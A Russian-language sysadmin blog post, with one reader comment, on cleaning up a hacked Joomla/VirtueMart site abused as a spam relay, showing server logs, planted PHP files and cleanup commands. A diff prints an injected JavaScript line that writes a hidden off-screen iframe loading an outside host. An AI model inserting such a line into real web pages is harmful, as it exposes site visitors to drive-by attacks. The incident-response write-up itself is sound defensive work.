Интересно почитать… Блог в котором есть много интересной информации…

7 января 2013

Почтовый спам на web-сервере через PHP

Категория: linux — dmitriano @ 14:59

Сегодня обнаружил на сервере странные файлы:

root@gate:/home# find . -name 'statisticsIjod.php'
./beauty/www/images/stories/wlw/statisticsIjod.php
./beauty/www/images/stories/soap/statisticsIjod.php
./beauty/www/images/stories/fruit/statisticsIjod.php
./beauty/www/images/stories/statisticsIjod.php
./beauty/www/images/stories/food/statisticsIjod.php

создавались эти файлы раз в минуту:

root@gate:/home# ll ./beauty/www/images/stories/wlw/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:30 ./beauty/www/images/stories/wlw/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/soap/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:29 ./beauty/www/images/stories/soap/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/fruit/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:28 ./beauty/www/images/stories/fruit/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:26 ./beauty/www/images/stories/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/food/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:27 ./beauty/www/images/stories/food/statisticsIjod.php

что достаточно странно.

Очевидно, что эти файлы были созданы каким-то PHP скриптом под группой beauty и юзером nobody. Судя по содержимому скрипт может быть использован для рассылки спама.

В логах Nginx-а его нет:

root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log
root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log.1

Зато есть файл guestbook5Su.php, который сидит рядом с ним:

80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"

К этому файлу кто-то постоянно обращается с разных айпишников:

65.35.164.12 - - [07/Jan/2013:14:07:44 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 74 "-" "Mozilla/5.0"
2.134.254.42 - - [07/Jan/2013:14:07:45 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 82 "-" "Mozilla/5.0"
94.159.191.212 - - [07/Jan/2013:14:07:46 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
189.149.33.174 - - [07/Jan/2013:14:10:54 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
41.72.103.22 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
95.56.138.120 - - [07/Jan/2013:14:12:06 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 379 "-" "Mozilla/5.0"
93.145.93.239 - - [07/Jan/2013:14:12:58 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 383 "-" "Mozilla/5.0"
94.20.154.186 - - [07/Jan/2013:14:13:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 86 "-" "Mozilla/5.0"
83.50.238.68 - - [07/Jan/2013:14:13:20 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
88.184.236.194 - - [07/Jan/2013:14:13:24 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
41.133.201.160 - - [07/Jan/2013:14:13:28 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
196.12.228.197 - - [07/Jan/2013:14:13:50 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"

И, судя по тому, что у меня в /var/log/mail.log, кто-то благополучно рассылает спам через sendmail:

Jan  7 13:27:29 gate sm-mta[12491]: r079RPmg012489: r079RTmg012491: DSN: Service unavailable
Jan  7 13:27:29 gate sm-mta[12491]: r079RTmg012491: to=<thelma_bridges@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as 1503BC8AF9)
Jan  7 13:31:53 gate sm-mta[12532]: r079VoJI012532: from=<marylou_stanley@milomag.ru>, size=525, class=0, nrcpts=1, msgid=<10abfc1-3210c-f9@milomag.ru>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]
Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: to=<potta2k6@hotmail.co>, delay=00:00:04, xdelay=00:00:03, mailer=relay, pri=120525, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=5.1.7, stat=Service unavailable
Jan  7 13:31:56 gate sm-mta[12534]: r079VoJI012532: r079VuJI012534: DSN: Service unavailable
Jan  7 13:31:56 gate sm-mta[12534]: r079VuJI012534: to=<marylou_stanley@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as F0BDBC7A6F)

Подозрительных файлов на сомом деле больше:

-rw-r--r-- 1 nobody beauty  6987 Dec 27 22:00 /home/beauty/www/images/stories/guestbook5Su.php
-rwxr-xr-x 1 nobody beauty   861 Dec 19 23:30 /home/beauty/www/images/stories/index.php*
-rw------- 1 nobody beauty  6987 Dec 19 21:26 /home/beauty/www/images/stories/statisticsIjod.php
-rw-r--r-- 1 nobody beauty   113 Dec 19 10:00 /home/beauty/www/images/stories/story.php
-rw-r--r-- 1 nobody beauty 11757 Dec 27 22:00 /home/beauty/www/images/stories/WMmain.php

Смотрим, что менялось за последний месяц в файловой системе:

root@gate:/home/beauty/www# find . -type f -mtime -30
./components/com_virtuemart/shop_image/product/_________________50ce299fdc14c.png
./components/com_virtuemart/shop_image/product/_________________50d3f152c1e11.png
./components/com_virtuemart/shop_image/product/resized/_________________50ce299fd6089_90x90.png
./components/com_virtuemart/shop_image/product/resized/_________________50d3f1526661a_90x90.png
./components/com_virtuemart/shop_image/JSCookTree.js
./images/stories/wlw/statisticsIjod.php
./images/stories/wlw/index.php
./images/stories/story.php
./images/stories/WMmain.php
./images/stories/soap/statisticsIjod.php
./images/stories/soap/index.php
./images/stories/.cache_ut1x50.php
./images/stories/fruit/statisticsIjod.php
./images/stories/fruit/index.php
./images/stories/a7XJ.html
./images/stories/guestbook5Su.php
./images/stories/docs/kastorovoe-maslo.png
./images/stories/docs/maslo-kakao-nerafinirovannoe.jpg
./images/stories/statisticsIjod.php
./images/stories/food/statisticsIjod.php
./images/stories/food/index.php
./images/stories/index.php

вот как раз эти файлы и ещё какой-то JSCookTree.js, который менялся сегодня:

root@gate:/home/beauty/www# ll ./components/com_virtuemart/shop_image/JSCookTree.js
-rw-rw-r-- 1 beauty beauty 21490 Jan  7 14:34 ./components/com_virtuemart/shop_image/JSCookTree.js

смотрим, что у него внутри:

root@gate:/home/beauty/www# find . -iname 'JSCookTree.js'
./components/com_virtuemart/shop_image/JSCookTree.js
./modules/mod_virtuemart/JSCookTree.js
root@gate:/home/beauty/www# diff ./components/com_virtuemart/shop_image/JSCookTree.js ./modules/mod_virtuemart/JSCookTree.js
860d859
< ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://exiryji.qhigh.com/945051d6f67c98d01b760e3d07b9b.dwFS0?13" height="500" width="500"></iframe>');
\ No newline at end of file

для начала просто всё удаляем:

rm ./components/com_virtuemart/shop_image/JSCookTree.js
rm ./images/stories/wlw/statisticsIjod.php ./images/stories/wlw/index.php
rm ./images/stories/story.php ./images/stories/WMmain.php ./images/stories/soap/statisticsIjod.php ./images/stories/soap/index.php ./images/stories/.cache_ut1x50.php ./images/stories/fruit/statisticsIjod.php ./images/stories/fruit/index.php ./images/stories/a7XJ.html ./images/stories/guestbook5Su.php ./images/stories/statisticsIjod.php ./images/stories/food/statisticsIjod.php ./images/stories/food/index.php ./images/stories/index.php

и запоминаем, что сегодня 7 января 2013, а последний спам был послан Jan  7 14:38:44 Улыбка

чистим очередь (http://www.cyberciti.biz/faq/linux-unix-bsd-clear-sendmail-queue/):

# cd /var/spool/mqueue/
# ls
# rm *

ссылки:

https://help.ubuntu.com/community/ClamAV
http://www.linuxquestions.org/questions/linux-newbie-8/free-anti-virus-for-ubuntu-925146/
http://sourceforge.net/projects/phpantivirus/ – эта штука работает, но ничего не находит
Линии 3D/Шарики 3D

1 комментарий »

  1. вот ещё кое-какие странные файлы:

    ~$ ll www/components/com_virtuemart/shop_image/
    total 92
    drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 ./
    drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ../
    -rw-r—r— 1 beauty beauty 1530 Dec 13 2011 239ebaf5ed90010adb37827bf5909800.sess
    -rw-r—r— 1 nobody beauty 1611 Jan 11 19:06 4309e0e42cbf33088ba8d725194a146c.sess
    -rw-r—r— 1 beauty beauty 1530 Dec 13 2011 61914ae25b970cf5ebc88220f5f64eed.sess
    -rw-r—r— 1 beauty beauty 1530 Dec 13 2011 733ffed41b5503bf962a250344f37181.sess
    -rw-rw-r— 1 beauty beauty 49 Nov 12 2005 blank.gif
    drwxrwxr-x 3 beauty beauty 4096 Feb 26 08:22 category/
    -rw-r—r— 1 beauty beauty 1530 Sep 29 2011 dc9a7709a9cd72691a4fbe553476e0a9.sess
    -rw-rw-r— 1 beauty beauty 0 Jan 4 2007 index.html
    drwxrwxr-x 3 beauty beauty 49152 Apr 2 17:48 product/
    drwxrwxr-x 3 beauty beauty 4096 Feb 4 06:17 ps_image/
    drwxrwxr-x 2 beauty beauty 4096 Feb 6 05:51 vendor/

    $ ll www/components/com_virtuemart
    total 84
    drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ./
    drwxr-xr-x 22 beauty beauty 4096 Aug 23 2012 ../
    -rw-r—r— 1 nobody beauty 297 Feb 1 00:28 34a44fb65e.php
    -rw-r—r— 1 nobody beauty 297 Feb 4 06:58 aef2d85b.php
    -rw-r—r— 1 nobody beauty 289 Dec 12 04:28 b1fdcd7.php
    -rw-r—r— 1 nobody beauty 289 Feb 4 23:01 c0875d1.php
    -rw-r—r— 1 beauty beauty 7678 Apr 10 2008 fetchscript.php
    drwxr-xr-x 8 beauty beauty 4096 Jun 20 2011 js/
    -rw-r—r— 1 beauty beauty 10165 Oct 17 2011 router.php
    drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 shop_image/
    -rw-r—r— 1 beauty beauty 5470 Feb 16 2009 show_image_in_imgtag.php
    drwxr-xr-x 13 beauty beauty 4096 Oct 2 2010 themes/
    -rw-r—r— 1 beauty beauty 11674 Aug 15 2011 virtuemart_parser.php
    -rw-r—r— 1 beauty beauty 7378 Aug 15 2011 virtuemart.php

    тут странные файлы я удалил

    Комментарий от admin — 13 апреля 2013 @ 10:44

RSS feed for comments on this post. TrackBack URL

Leave a comment

SlogPost.ru